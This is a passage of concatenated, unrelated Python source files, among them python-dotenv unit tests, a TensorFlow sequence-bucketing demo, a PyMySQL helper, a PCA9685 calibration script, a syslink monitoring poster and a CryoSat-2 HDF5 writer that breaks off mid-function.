# for train
t_loss, graph_embed, linear_embed = train(inp, outp, d_name, model, 'train', optimizer, train_loader, device)
# for valid
v_acc = valid(inp, outp, d_name, model, 'valid', optimizer, valid_loader, device)
# for test
t_acc = test(inp, outp, d_name, model, 'test', optimizer, test_loader, device)
print('Epoch {:03d}, Train Loss: {:.4f}, Valid acc :{:.4f}, Test acc : {:.4f}'.format(
epoch, t_loss, v_acc, t_acc ))
if v_acc > best_valid_acc:
best_valid_acc = v_acc
best_test_acc = t_acc
best_epoch = epoch
best_linear_embed = linear_embed
best_graph_embed = graph_embed
# this is for loading model for predicting a batch of training set
#model_path = '/home/jiaqing/桌面/Fea2Fea/src/model_pkl/'
#torch.save(model, model_path + '/model_tsne_{}.pkl'.format(d_name))
op_iters=0
op_iters+=1
if op_iters > 20:
break
#model_path = '/home/jiaqing/桌面/Fea2Fea/src/model_pkl/'
#model = torch.load(model_path + '/model_tsne_{}.pkl'.format(d_name))
#model.to(device)
print("visualizing embeddings...")
train_tsne(inp, outp, d_name, best_linear_embed, best_graph_embed, 'train', train_loader, device, k = 6)
|
the-stack_106_23854 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import logging
import os
import sys
import textwrap
import mock
import pytest
import sh
import dotenv
from dotenv.compat import PY2, StringIO
def test_set_key_no_file(tmp_path):
nx_file = str(tmp_path / "nx")
logger = logging.getLogger("dotenv.main")
with mock.patch.object(logger, "warning") as mock_warning:
result = dotenv.set_key(nx_file, "foo", "bar")
assert result == (None, "foo", "bar")
assert not os.path.exists(nx_file)
mock_warning.assert_called_once_with(
"Can't write to %s - it doesn't exist.",
nx_file,
)
@pytest.mark.parametrize(
"before,key,value,expected,after",
[
("", "a", "", (True, "a", ""), 'a=""\n'),
("", "a", "b", (True, "a", "b"), 'a="b"\n'),
("", "a", "'b'", (True, "a", "b"), 'a="b"\n'),
("", "a", "\"b\"", (True, "a", "b"), 'a="b"\n'),
("", "a", "b'c", (True, "a", "b'c"), 'a="b\'c"\n'),
("", "a", "b\"c", (True, "a", "b\"c"), 'a="b\\\"c"\n'),
("a=b", "a", "c", (True, "a", "c"), 'a="c"\n'),
("a=b\n", "a", "c", (True, "a", "c"), 'a="c"\n'),
("a=b\n\n", "a", "c", (True, "a", "c"), 'a="c"\n\n'),
("a=b\nc=d", "a", "e", (True, "a", "e"), 'a="e"\nc=d'),
("a=b\nc=d\ne=f", "c", "g", (True, "c", "g"), 'a=b\nc="g"\ne=f'),
("a=b\n", "c", "d", (True, "c", "d"), 'a=b\nc="d"\n'),
],
)
def test_set_key(dotenv_file, before, key, value, expected, after):
logger = logging.getLogger("dotenv.main")
with open(dotenv_file, "w") as f:
f.write(before)
with mock.patch.object(logger, "warning") as mock_warning:
result = dotenv.set_key(dotenv_file, key, value)
assert result == expected
assert open(dotenv_file, "r").read() == after
mock_warning.assert_not_called()
def test_set_key_permission_error(dotenv_file):
os.chmod(dotenv_file, 0o000)
with pytest.raises(Exception):
dotenv.set_key(dotenv_file, "a", "b")
os.chmod(dotenv_file, 0o600)
with open(dotenv_file, "r") as fp:
assert fp.read() == ""
def test_get_key_no_file(tmp_path):
nx_file = str(tmp_path / "nx")
logger = logging.getLogger("dotenv.main")
with mock.patch.object(logger, "info") as mock_info, \
mock.patch.object(logger, "warning") as mock_warning:
result = dotenv.get_key(nx_file, "foo")
assert result is None
mock_info.assert_has_calls(
calls=[
mock.call("Python-dotenv could not find configuration file %s.", nx_file)
],
)
mock_warning.assert_has_calls(
calls=[
mock.call("Key %s not found in %s.", "foo", nx_file)
],
)
def test_get_key_not_found(dotenv_file):
logger = logging.getLogger("dotenv.main")
with mock.patch.object(logger, "warning") as mock_warning:
result = dotenv.get_key(dotenv_file, "foo")
assert result is None
mock_warning.assert_called_once_with("Key %s not found in %s.", "foo", dotenv_file)
def test_get_key_ok(dotenv_file):
logger = logging.getLogger("dotenv.main")
with open(dotenv_file, "w") as f:
f.write("foo=bar")
with mock.patch.object(logger, "warning") as mock_warning:
result = dotenv.get_key(dotenv_file, "foo")
assert result == "bar"
mock_warning.assert_not_called()
def test_get_key_none(dotenv_file):
logger = logging.getLogger("dotenv.main")
with open(dotenv_file, "w") as f:
f.write("foo")
with mock.patch.object(logger, "warning") as mock_warning:
result = dotenv.get_key(dotenv_file, "foo")
assert result is None
mock_warning.assert_not_called()
def test_unset_with_value(dotenv_file):
logger = logging.getLogger("dotenv.main")
with open(dotenv_file, "w") as f:
f.write("a=b\nc=d")
with mock.patch.object(logger, "warning") as mock_warning:
result = dotenv.unset_key(dotenv_file, "a")
assert result == (True, "a")
with open(dotenv_file, "r") as f:
assert f.read() == "c=d"
mock_warning.assert_not_called()
def test_unset_no_value(dotenv_file):
logger = logging.getLogger("dotenv.main")
with open(dotenv_file, "w") as f:
f.write("foo")
with mock.patch.object(logger, "warning") as mock_warning:
result = dotenv.unset_key(dotenv_file, "foo")
assert result == (True, "foo")
with open(dotenv_file, "r") as f:
assert f.read() == ""
mock_warning.assert_not_called()
def test_unset_non_existent_file(tmp_path):
nx_file = str(tmp_path / "nx")
logger = logging.getLogger("dotenv.main")
with mock.patch.object(logger, "warning") as mock_warning:
result = dotenv.unset_key(nx_file, "foo")
assert result == (None, "foo")
mock_warning.assert_called_once_with(
"Can't delete from %s - it doesn't exist.",
nx_file,
)
def prepare_file_hierarchy(path):
"""
Create a temporary folder structure like the following:
test_find_dotenv0/
└── child1
├── child2
│ └── child3
│ └── child4
└── .env
Then try to automatically `find_dotenv` starting in `child4`
"""
curr_dir = path
dirs = []
for f in ['child1', 'child2', 'child3', 'child4']:
curr_dir /= f
dirs.append(curr_dir)
curr_dir.mkdir()
return (dirs[0], dirs[-1])
def test_find_dotenv_no_file_raise(tmp_path):
(root, leaf) = prepare_file_hierarchy(tmp_path)
os.chdir(str(leaf))
with pytest.raises(IOError):
dotenv.find_dotenv(raise_error_if_not_found=True, usecwd=True)
def test_find_dotenv_no_file_no_raise(tmp_path):
(root, leaf) = prepare_file_hierarchy(tmp_path)
os.chdir(str(leaf))
result = dotenv.find_dotenv(usecwd=True)
assert result == ""
def test_find_dotenv_found(tmp_path):
(root, leaf) = prepare_file_hierarchy(tmp_path)
os.chdir(str(leaf))
dotenv_file = root / ".env"
dotenv_file.write_bytes(b"TEST=test\n")
result = dotenv.find_dotenv(usecwd=True)
assert result == str(dotenv_file)
@mock.patch.dict(os.environ, {}, clear=True)
def test_load_dotenv_existing_file(dotenv_file):
with open(dotenv_file, "w") as f:
f.write("a=b")
result = dotenv.load_dotenv(dotenv_file)
assert result is True
assert os.environ == {"a": "b"}
def test_load_dotenv_no_file_verbose():
logger = logging.getLogger("dotenv.main")
with mock.patch.object(logger, "info") as mock_info:
dotenv.load_dotenv('.does_not_exist', verbose=True)
mock_info.assert_called_once_with("Python-dotenv could not find configuration file %s.", ".does_not_exist")
@mock.patch.dict(os.environ, {"a": "c"}, clear=True)
def test_load_dotenv_existing_variable_no_override(dotenv_file):
with open(dotenv_file, "w") as f:
f.write("a=b")
result = dotenv.load_dotenv(dotenv_file, override=False)
assert result is True
assert os.environ == {"a": "c"}
@mock.patch.dict(os.environ, {"a": "c"}, clear=True)
def test_load_dotenv_existing_variable_override(dotenv_file):
with open(dotenv_file, "w") as f:
f.write("a=b")
result = dotenv.load_dotenv(dotenv_file, override=True)
assert result is True
assert os.environ == {"a": "b"}
@mock.patch.dict(os.environ, {}, clear=True)
def test_load_dotenv_utf_8():
stream = StringIO("a=à")
result = dotenv.load_dotenv(stream=stream)
assert result is True
if PY2:
assert os.environ == {"a": "à".encode(sys.getfilesystemencoding())}
else:
assert os.environ == {"a": "à"}
def test_load_dotenv_in_current_dir(tmp_path):
dotenv_path = tmp_path / '.env'
dotenv_path.write_bytes(b'a=b')
code_path = tmp_path / 'code.py'
code_path.write_text(textwrap.dedent("""
import dotenv
import os
dotenv.load_dotenv(verbose=True)
print(os.environ['a'])
"""))
os.chdir(str(tmp_path))
result = sh.Command(sys.executable)(code_path)
assert result == 'b\n'
def test_dotenv_values_file(dotenv_file):
with open(dotenv_file, "w") as f:
f.write("a=b")
result = dotenv.dotenv_values(dotenv_file)
assert result == {"a": "b"}
@pytest.mark.parametrize(
"env,string,interpolate,expected",
[
# Defined in environment, with and without interpolation
({"b": "c"}, "a=$b", False, {"a": "$b"}),
({"b": "c"}, "a=$b", True, {"a": "$b"}),
({"b": "c"}, "a=${b}", False, {"a": "${b}"}),
({"b": "c"}, "a=${b}", True, {"a": "c"}),
({"b": "c"}, "a=${b:-d}", False, {"a": "${b:-d}"}),
({"b": "c"}, "a=${b:-d}", True, {"a": "c"}),
# Defined in file
({}, "b=c\na=${b}", True, {"a": "c", "b": "c"}),
# Undefined
({}, "a=${b}", True, {"a": ""}),
({}, "a=${b:-d}", True, {"a": "d"}),
# With quotes
({"b": "c"}, 'a="${b}"', True, {"a": "c"}),
({"b": "c"}, "a='${b}'", True, {"a": "c"}),
# With surrounding text
({"b": "c"}, "a=x${b}y", True, {"a": "xcy"}),
# Self-referential
({"a": "b"}, "a=${a}", True, {"a": "b"}),
({}, "a=${a}", True, {"a": ""}),
({"a": "b"}, "a=${a:-c}", True, {"a": "b"}),
({}, "a=${a:-c}", True, {"a": "c"}),
# Reused
({"b": "c"}, "a=${b}${b}", True, {"a": "cc"}),
],
)
def test_dotenv_values_stream(env, string, interpolate, expected):
with mock.patch.dict(os.environ, env, clear=True):
stream = StringIO(string)
stream.seek(0)
result = dotenv.dotenv_values(stream=stream, interpolate=interpolate)
assert result == expected
|
the-stack_106_23855 | #!/usr/bin/python2
# coding=utf8
import os
import sys
import json
import requests
import logging
reload(sys)
sys.setdefaultencoding('utf-8')
logging.basicConfig(level=logging.INFO,
format='%(asctime)s [%(levelname)s] %(message)s (%(filename)s:L%(lineno)d)',
datefmt='%Y-%m-%d %H:%M:%S',
filename='/tmp/post_syslink.log',
filemode='a')
logger = logging.getLogger(__name__)
token = 'xxxxxx'
server_ip = '192.168.100.150'
server_name = 'alerts888.yhglobal.cn'
headers = {"Host": server_name}
url = "http://{}/monitor/received/syslink/info/".format(server_ip)
url = "http://{}/monitor/received/syslink/data/".format(server_ip)
def post_data(payload):
try:
logger.info("payload is: {}".format(payload))
r = requests.post(url, data=json.dumps(payload), headers=headers)
logger.info("r.status_code is: {}".format(r.status_code))
if r.text:
logger.info(r.text)
print("{} {}".format(r.status_code, r.text))
else:
logger.info("Server return http status code: {0}".format(r.status_code))
except Exception as msg:
logger.info(msg)
if __name__ == '__main__':
try:
para01 = sys.argv[1]
if '-f' == para01:
para02 = sys.argv[2]
if not os.path.exists(para02):
print("No such file: {}".format(para02))
exit(1)
else:
with open(para02, 'r') as f:
para01 = f.read()
try:
data = json.loads(para01)
except:
exit(2)
payload = {
"token": token
}
if isinstance(data, list):
payload["data"] = data
else:
payload.update(data)
print(payload)
post_data(payload)
except Exception as e:
print(str(e))
|
the-stack_106_23857 | # Copyright 2018 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
import batch_operation_sample
def test_batch_operation_sample(capsys):
batch_operation_sample.run_sample()
out, _ = capsys.readouterr()
expected = (
'.*Company generated:.*Company created:.*.*Job created:.*Job '
'created:.*.*Job updated:.*Engineer in Mountain View.*Job '
'updated:.*Engineer in Mountain View.*.*Job deleted.*Job '
'deleted.*.*Company deleted.*')
assert re.search(expected, out, re.DOTALL)
|
the-stack_106_23861 |
#encoding=utf-8
import numpy as np
import tensorflow as tf
class SequenceTable:
def __init__(self, data):
# A TensorArray is required as the sequences don't have the same
# length. Alternatively a FIFOQueue can be used.
# Because the data is read more than once by the queue,
# clear_after_read is set to False (but I can't confirm an effect).
# Because the items has diffrent sequence lengths the infer_shape
# is set to False. The shape is then restored in the .read method.
self.table = tf.TensorArray(size=len(data),
dtype=data[0].dtype,
dynamic_size=False,
clear_after_read=False,
infer_shape=False)
# initialize table
for i, datum in enumerate(data):
self.table = self.table.write(i, datum)
# setup infered element shape
self.element_shape = tf.TensorShape((None,) + data[0].shape[1:])
def read(self, index):
# read index from table and set infered shape
read = self.table.read(index)
read.set_shape(self.element_shape)
return read
def shuffle_bucket_batch(input_length, tensors, shuffle=True, **kwargs):
# bucket_by_sequence_length requires the input_length and tensors
# arguments to be queues. Use a range_input_producer queue to shuffle
# an index for sliceing the input_length and tensors laters.
# This strategy is idendical to the one used in slice_input_producer.
table_index = tf.train.range_input_producer(
int(input_length.get_shape()[0]), shuffle=shuffle
).dequeue()
# the first argument is the sequence length specifed in the input_length
# I did not find a ue for it.
_, batch_tensors = tf.contrib.training.bucket_by_sequence_length(
input_length=tf.gather(input_length, table_index),
tensors=[tensor.read(table_index) for tensor in tensors],
**kwargs
)
return tuple(batch_tensors)
def test_main():
# these values specify the length of the sequence and this controls how
# the data is bucketed. The value is not required to be the acutal length,
# which is also problematic when using pairs of sequences that have diffrent
# length. In that case just specify a value that gives the best performance,
# for example "the max length".
length_table = tf.constant([2, 4, 3, 4, 3, 5], dtype=tf.int32)
source_table = SequenceTable([
np.asarray([3, 4], dtype=np.int32),
np.asarray([2, 3, 4], dtype=np.int32),
np.asarray([1, 3, 4], dtype=np.int32),
np.asarray([5, 3, 4], dtype=np.int32),
np.asarray([6, 3, 4], dtype=np.int32),
np.asarray([3, 3, 3, 3, 3, 3], dtype=np.int32)
])
target_table = SequenceTable([
np.asarray([9], dtype=np.int32),
np.asarray([9, 3, 4, 5], dtype=np.int32),
np.asarray([9, 3, 4], dtype=np.int32),
np.asarray([9, 3, 4, 6], dtype=np.int32),
np.asarray([9, 3], dtype=np.int32),
np.asarray([9, 3, 3, 3, 3, 3, 2], dtype=np.int32)
])
source_batch, target_batch = shuffle_bucket_batch(
length_table, [source_table, target_table],
batch_size=2,
# devices buckets into [len < 3, 3 <= len < 5, 5 <= len]
bucket_boundaries=[1, 3, 5],
# this will bad the source_batch and target_batch independently
dynamic_pad=True,
capacity=2
)
with tf.Session() as sess:
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(sess, coord)
for i in range(6):
source, target = sess.run((source_batch, target_batch))
print('source_output[{}]'.format(i))
print(source)
print('target_output[{}]'.format(i))
print(target)
print('')
coord.request_stop()
coord.join(threads)
if __name__ == "__main__":
test_main() |
the-stack_106_23864 | # a cursor is the object we use to interact with the database
import pymysql.cursors
# this class will give us an instance of a connection to our database
class MySQLConnection:
def __init__(self, db):
# change the user and password as needed
connection = pymysql.connect(host = 'localhost',
user = 'root',
password = 'root',
db = db,
charset = 'utf8mb4',
cursorclass = pymysql.cursors.DictCursor,
autocommit = True)
# establish the connection to the database
self.connection = connection
# the method to query the database
def query_db(self, query, data=None):
with self.connection.cursor() as cursor:
try:
query = cursor.mogrify(query, data)
print("Running Query:", query)
cursor.execute(query)
if query.lower().find("insert") >= 0:
# INSERT queries will return the ID NUMBER of the row inserted
self.connection.commit()
return cursor.lastrowid
elif query.lower().find("select") >= 0:
# SELECT queries will return the data from the database as a LIST OF DICTIONARIES
result = cursor.fetchall()
return result
else:
# UPDATE and DELETE queries will return nothing
self.connection.commit()
except Exception as e:
# if the query fails the method will return FALSE
print("Something went wrong", e)
return False
finally:
# close the connection
self.connection.close()
# connectToMySQL receives the database we're using and uses it to create an instance of MySQLConnection
def connectToMySQL(db):
return MySQLConnection(db)
|
the-stack_106_23866 | import os
ALBUM_FIELD = "ALBUM: "
ARTIST_FIELD = "ARTIST: "
URL_FIELD = "URL: "
SEPARATOR_FIELD = "SEPARATOR: "
FORMAT_FIELD = "FORMAT: "
TIME_TITLE_TYPE = "TIME->TITLE"
TITLE_TIME_TYPE = "TITLE->TIME"
class SongsInfoReader:
track_list_file = ""
def __init__(self, track_list_file: str):
self.track_list_file = track_list_file
self.youtube_link = ""
self.artist = ""
self.album = ""
self.separator = ""
self.is_format_time_title = True
self.directory = ""
self.song_info_list = []
def read(self):
with open(self.track_list_file, "r") as file:
try:
self.youtube_link = file.readline().split(URL_FIELD)[1].strip("\n")
self.artist = file.readline().split(ARTIST_FIELD)[1].strip("\n")
self.album = file.readline().split(ALBUM_FIELD)[1].strip("\n")
self.separator = file.readline().split(SEPARATOR_FIELD)[1].strip("\n").strip("\"")
format_time_title = file.readline().split(FORMAT_FIELD)[1].strip("\n")
if format_time_title != TIME_TITLE_TYPE and format_time_title != TITLE_TIME_TYPE:
raise ValueError
self.is_format_time_title = format_time_title == TIME_TITLE_TYPE
except (ValueError, IndexError):
raise ValueError("Invalid header input")
self.directory = os.path.dirname(os.path.realpath(__file__)) + "/" + self.artist + " - " + self.album
file.readline()
lines = file.readlines()
for item in lines:
param1, param2 = item.strip("\n").split(self.separator)
if self.is_format_time_title:
time = param1
title = param2
else:
time = param2
title = param1
self.song_info_list.append(SongInfo(title, time))
if len(self.song_info_list) == 0:
raise ValueError("Invalid songs information input")
for index, item in enumerate(self.song_info_list):
if isinstance(item, list) and len(item) != 2:
raise ValueError("Invalid songs information input for {} at index {}".format(item, index))
class SongInfo:
def __init__(self, title: str, time: str):
self.title = title
self.time = time
|
the-stack_106_23867 | # This advanced example can be used to compute a more precise reference_clock_speed. Use an
# oscilloscope or logic analyzer to measure the signal frequency and type the results into the
# prompts. At the end it'll give you a more precise value around 25 mhz for your reference clock
# speed.
import time
from board import SCL, SDA
import busio
# Import the PCA9685 module.
from adafruit_pca9685 import PCA9685
# Create the I2C bus interface.
i2c_bus = busio.I2C(SCL, SDA)
# Create a simple PCA9685 class instance.
pca = PCA9685(i2c_bus)
# Set the PWM frequency to 100hz.
pca.frequency = 100
input("Press enter when ready to measure default frequency.")
# Set the PWM duty cycle for channel zero to 50%. duty_cycle is 16 bits to match other PWM objects
# but the PCA9685 will only actually give 12 bits of resolution.
print("Running with default calibration")
pca.channels[0].duty_cycle = 0x7FFF
time.sleep(1)
pca.channels[0].duty_cycle = 0
measured_frequency = float(input("Frequency measured: "))
print()
pca.reference_clock_speed = pca.reference_clock_speed * (
measured_frequency / pca.frequency
)
# Set frequency again so we can get closer. Reading it back will produce the real value.
pca.frequency = 100
input("Press enter when ready to measure coarse calibration frequency.")
pca.channels[0].duty_cycle = 0x7FFF
time.sleep(1)
pca.channels[0].duty_cycle = 0
measured_after_calibration = float(input("Frequency measured: "))
print()
reference_clock_speed = measured_after_calibration * 4096 * pca.prescale_reg
print("Real reference clock speed: {0:.0f}".format(reference_clock_speed))
|
the-stack_106_23868 | import torch
from torch import cuda
from torch.nn import Module
from torch.optim.optimizer import Optimizer
from torch.utils.data.dataloader import DataLoader
from . import BaseTrainer
class StickModel(Module):
def __init__(
self,
model: Module,
loss_fn,
optimizer: Optimizer,
trainer: BaseTrainer,
device: torch.device = torch.device("cuda" if cuda.is_available() else "cpu")
):
super().__init__()
self.model = model
self.loss_fn = loss_fn
self.optimizer = optimizer
self.trainer = trainer
self.device = device
self.model.to(device)
def forward(self, x):
return self.model(x)
def fit(self, epochs, data_loader, test_loader):
self.trainer.fit(self, epochs, data_loader, test_loader)
def evaluate(self, data_loader):
self.trainer.evaluate(self, data_loader)
def data_loader_factory(
dataset, test_dataset, epochs=20, batch_size=1, shuffle=False, sampler=None,
batch_sampler=None, num_workers=0, collate_fn=None,
pin_memory=False, drop_last=False, timeout=0,
worker_init_fn=None, multiprocessing_context=None
):
loader_config = {'batch_size': batch_size,
'shuffle': shuffle,
'sampler': sampler,
'batch_sampler': batch_sampler,
'num_workers': num_workers,
'collate_fn': collate_fn,
'pin_memory': pin_memory,
'drop_last': drop_last,
'timeout': timeout,
'worker_init_fn': worker_init_fn,
'multiprocessing_context': multiprocessing_context
}
data_loader = DataLoader(dataset=dataset, **loader_config)
test_loader = DataLoader(dataset=test_dataset, **loader_config)
return epochs, data_loader, test_loader
|
the-stack_106_23869 | #!/usr/bin/env python
u"""
HDF5_cryosat_L1b.py (08/2020)
Reads and Writes HDF5 files for CryoSat-2 Level-1b data products
Supported CryoSat Modes: LRM, SAR, SARin, FDM, SID, GDR
OUTPUTS a formatted HDF5 file with:
Location: Time and Orbit Group
Data: Measurements Group
Geometry: External Corrections Group
Waveform_1Hz: Average Waveforms Group
Waveform_20Hz: Waveforms Group (with SAR/SARIN Beam Behavior Parameters)
METADATA: MPH, SPH and DSD Header data
OPTIONS:
BASELINE (HDF5_cryosat_L1b): CryoSat-2 baseline (A, B, C)
FILENAME (HDF5_cryosat_L1b): output HDF5 file name
TITLE (HDF5_cryosat_L1b): output file description
HEADER (HDF5_cryosat_L1b): output CryoSat-2 file headers (MPH, SPH, DSD)
1: for single CryoSat-2 files
2: for merged CryoSat-2 files from convert_cryosat_L1b.py
CLOBBER (HDF5_cryosat_L1b): overwrite existing HDF5 file
VERBOSE: print HDF5 structure parameters to screen
ATTRIBUTES (read_HDF5_cryosat_L1b): input variable attributes from HDF5 file
PYTHON DEPENDENCIES:
numpy: Scientific Computing Tools For Python (https://numpy.org)
h5py: Python interface for Hierarchal Data Format 5 (HDF5)
(https://www.h5py.org/)
UPDATE HISTORY:
Updated 08/2020: flake8 updates for python3
Updated 02/2020: convert from hard to soft tabulation
Updated 10/2019: changing Y/N flags to True/False
Updated 09/2019: updates for Baseline D
Updated 04/2019: print HDF5 keys from list for python3 compatibility
Updated 06/2018: use items instead of iteritems for python3 compatibility
Updated 05/2016: using __future__ print function
Updated 04/2016: fixed read attributes for Beam Behavior Parameters
Written 03/2016
"""
from __future__ import print_function
import os
import re
import h5py
#-- PURPOSE: write CryoSat-2 HDF5 files
def HDF5_cryosat_L1b(CS_l1b_mds, MODE, BASELINE, FILENAME='', TITLE='',
HEADER=0, CLOBBER=True, VERBOSE=False):
#-- setting HDF5 clobber attribute
if CLOBBER:
clobber = 'w'
else:
clobber = 'w-'
#-- getting HDF5 dataset attributes for each variable
CS_l1b_attrib = cryosat_L1b_attributes(MODE, BASELINE)
#-- open output HDF5 file
fileID = h5py.File(os.path.expanduser(FILENAME), clobber)
#-- create sub-groups within HDF5 file
fileID.create_group('Location')
fileID.create_group('Data')
fileID.create_group('Geometry')
fileID.create_group('Waveform_1Hz')
fileID.create_group('Waveform_20Hz')
#-- for SAR and SARIN modes: add subgroup for Beam Behavior Parameters
#-- within Waveform_20Hz group
if MODE in ('SAR','SIN'):
fileID['Waveform_20Hz'].create_group('Beam')
#-- Dimensions of parameters
n_records,n_blocks = CS_l1b_mds['Location']['Day'].shape
n_1Hz_wfm = CS_l1b_mds['Waveform_1Hz']['Waveform'].shape[1]
n_20Hz_wfm = CS_l1b_mds['Waveform_20Hz']['Waveform'].shape[2]
#-- find keys to output (do not output empty Spares variables)
Location_keys = [key for key in CS_l1b_mds['Location'].keys() if not
re.search('Spare',key)]
Data_keys = [key for key in CS_l1b_mds['Data'].keys() if not
re.search('Spare',key)]
Geometry_keys = [key for key in CS_l1b_mds['Geometry'].keys() if not
re.search('Spare',key)]
Wfm_1Hz_keys = [key for key in CS_l1b_mds['Waveform_1Hz'].keys() if not
re.search('Spare',key)]
Wfm_20Hz_keys = [key for key in CS_l1b_mds['Waveform_20Hz'].keys() if not
re.search('Spare',key)]
if MODE in ('SAR','SIN'):
beam_keys = [key for key in CS_l1b_mds['Waveform_20Hz']['Beam'].keys()
if not re.search('Spare',key)]
#-- create HDF5 records
h5 = {}
h5['Location'] = {}
h5['Data'] = {}
h5['Geometry'] = {}
h5['Waveform_1Hz'] = {}
h5['Waveform_20Hz'] = {}
#-- CryoSat-2 Time and Orbit Group
for key in Location_keys:
val = CS_l1b_mds['Location'][key]
if key in ('Sat_velocity','Real_beam','Baseline'):
#-- Defining the HDF5 dataset variables
h5['Location'][key] = fileID.create_dataset('Location/{0}'.format(key),
(n_records,n_blocks,3,), data=val, dtype=val.dtype,
compression='gzip')
#-- attach dimensions
h5['Location'][key].dims[0].label='CS_L1b_MDS_REC_SIZE'
h5['Location'][key].dims[1].label='CS_L1b_MDS_BLOCK_SIZE'
h5['Location'][key].dims[2].label='CS_L1b_MDS_VECTOR_SIZE'
else:
#-- Defining the HDF5 dataset variables
h5['Location'][key] = fileID.create_dataset('Location/{0}'.format(key),
(n_records,n_blocks,), data=val, dtype=val.dtype,
compression='gzip')
#-- attach dimensions
h5['Location'][key].dims[0].label='CS_L1b_MDS_REC_SIZE'
h5['Location'][key].dims[1].label='CS_L1b_MDS_BLOCK_SIZE'
#-- add HDF5 variable attributes
for att_name,att_val in CS_l1b_attrib['Location'][key].items():
h5['Location'][key].attrs[att_name] = att_val
#-- CryoSat-2 Measurement Group
#-- Derived from instrument measurement parameters
for key in Data_keys:
val = CS_l1b_mds['Data'][key]
#-- Defining the HDF5 dataset variables
h5['Data'][key] = fileID.create_dataset('Data/{0}'.format(key),
(n_records,n_blocks,), data=val, dtype=val.dtype, compression='gzip')
#-- attach dimensions
h5['Data'][key].dims[0].label='CS_L1b_MDS_REC_SIZE'
h5['Data'][key].dims[1].label='CS_L1b_MDS_BLOCK_SIZE'
#-- add HDF5 variable attributes
for att_name,att_val in CS_l1b_attrib['Data'][key].items():
h5['Data'][key].attrs[att_name] = att_val
#-- CryoSat-2 External Corrections Group
for key in Geometry_keys:
val = CS_l1b_mds['Geometry'][key]
#-- Defining the HDF5 dataset variables
h5['Geometry'][key] = fileID.create_dataset('Geometry/{0}'.format(key),
(n_records,), data=val, dtype=val.dtype, compression='gzip')
#-- attach dimensions
h5['Geometry'][key].dims[0].label='CS_L1b_MDS_REC_SIZE'
#-- add HDF5 variable attributes
for att_name,att_val in CS_l1b_attrib['Geometry'][key].items():
h5['Geometry'][key].attrs[att_name] = att_val
#-- CryoSat-2 Average Waveforms Group
for key in Wfm_1Hz_keys:
val = CS_l1b_mds['Waveform_1Hz'][key]
if key in ('Waveform'):
#-- Defining the HDF5 dataset variables
h5['Waveform_1Hz'][key] = fileID.create_dataset('Waveform_1Hz/{0}'.format(key),
(n_records,n_1Hz_wfm), data=val, dtype=val.dtype,
compression='gzip')
#-- attach dimensions
h5['Waveform_1Hz'][key].dims[0].label='CS_L1b_MDS_REC_SIZE'
h5['Waveform_1Hz'][key].dims[1].label='CS_L1b_MDS_1Hz_WAVEFORM_SIZE'
else:
#-- Defining the HDF5 dataset variables
h5['Waveform_1Hz'][key] = fileID.create_dataset('Waveform_1Hz/{0}'.format(key),
(n_records,), data=val, dtype=val.dtype, compression='gzip')
#-- attach dimensions
h5['Waveform_1Hz'][key].dims[0].label='CS_L1b_MDS_REC_SIZE'
#-- add HDF5 variable attributes
for att_name,att_val in CS_l1b_attrib['Waveform_1Hz'][key].items():
h5['Waveform_1Hz'][key].attrs[att_name] = att_val
#-- CryoSat-2 Waveforms Group with Beam Behavior Parameters
for key in Wfm_20Hz_keys:
val = CS_l1b_mds['Waveform_20Hz'][key]
if key in ('Waveform','Coherence','Phase_diff'):
#-- Defining the HDF5 dataset variables
h5['Waveform_20Hz'][key] = fileID.create_dataset('Waveform_20Hz/{0}'.format(key),
(n_records,n_blocks,n_20Hz_wfm,), data=val, dtype=val.dtype,
compression='gzip')
#-- attach dimensions
h5['Waveform_20Hz'][key].dims[0].label='CS_L1b_MDS_REC_SIZE'
h5['Waveform_20Hz'][key].dims[1].label='CS_L1b_MDS_BLOCK_SIZE'
h5['Waveform_20Hz'][key].dims[2].label='CS_L1b_MDS_20Hz_WAVEFORM_SIZE'
#-- add HDF5 variable attributes
for att_name,att_val in CS_l1b_attrib['Waveform_20Hz'][key].items():
h5['Waveform_20Hz'][key].attrs[att_name] = att_val
elif key in ('Beam'):
h5['Waveform_20Hz'][key] = {}
for ds_name in beam_keys:
ds_val = val[ds_name]
#-- Defining the HDF5 dataset variables
h5['Waveform_20Hz'][key][ds_name] = fileID.create_dataset(
'Waveform_20Hz/{0}/{1}'.format(key,ds_name), (n_records,n_blocks,),
data=ds_val, dtype=ds_val.dtype, compression='gzip')
#-- attach dimensions
h5['Waveform_20Hz'][key][ds_name].dims[0].label='CS_L1b_MDS_REC_SIZE'
h5['Waveform_20Hz'][key][ds_name].dims[1].label='CS_L1b_MDS_BLOCK_SIZE'
#-- add HDF5 variable attributes
for att_name,att_val in CS_l1b_attrib['Waveform_20Hz'][key][ds_name].items():
h5['Waveform_20Hz'][key][ds_name].attrs[att_name] = att_val
else:
#-- Defining the HDF5 dataset variables
h5['Waveform_20Hz'][key] = fileID.create_dataset('Waveform_20Hz/{0}'.format(key),
(n_records,n_blocks,), data=val, dtype=val.dtype, compression='gzip')
#-- attach dimensions
h5['Waveform_20Hz'][key].dims[0].label='CS_L1b_MDS_REC_SIZE'
h5['Waveform_20Hz'][key].dims[1].label='CS_L1b_MDS_BLOCK_SIZE'
#-- add HDF5 variable attributes
for att_name,att_val in CS_l1b_attrib['Waveform_20Hz'][key].items():
h5['Waveform_20Hz'][key].attrs[att_name] = att_val
#-- output MPH/SPH/DSD headers as group attributes
if (HEADER == 1):
#-- HEADER 1 is for single CryoSat-2 files
fileID.create_group('METADATA')
fileID['METADATA'].create_group('MPH')
fileID['METADATA'].create_group('SPH')
fileID['METADATA'].create_group('DSD')
#-- Main Product Header (MPH) are all strings
for att_name,att_val in CS_l1b_mds['METADATA']['MPH'].items():
fileID['METADATA']['MPH'].attrs[att_name] = att_val
#-- Specific Product Header (SPH) are both strings and dictionaries
for att_name,att_val in CS_l1b_mds['METADATA']['SPH'].items():
if isinstance(att_val,dict):
#-- if att_val is dictionary
fileID['METADATA']['SPH'].create_group(att_name)
for ds_name,ds_val in att_val.items():
fileID['METADATA']['SPH'][att_name].attrs[ds_name] = ds_val
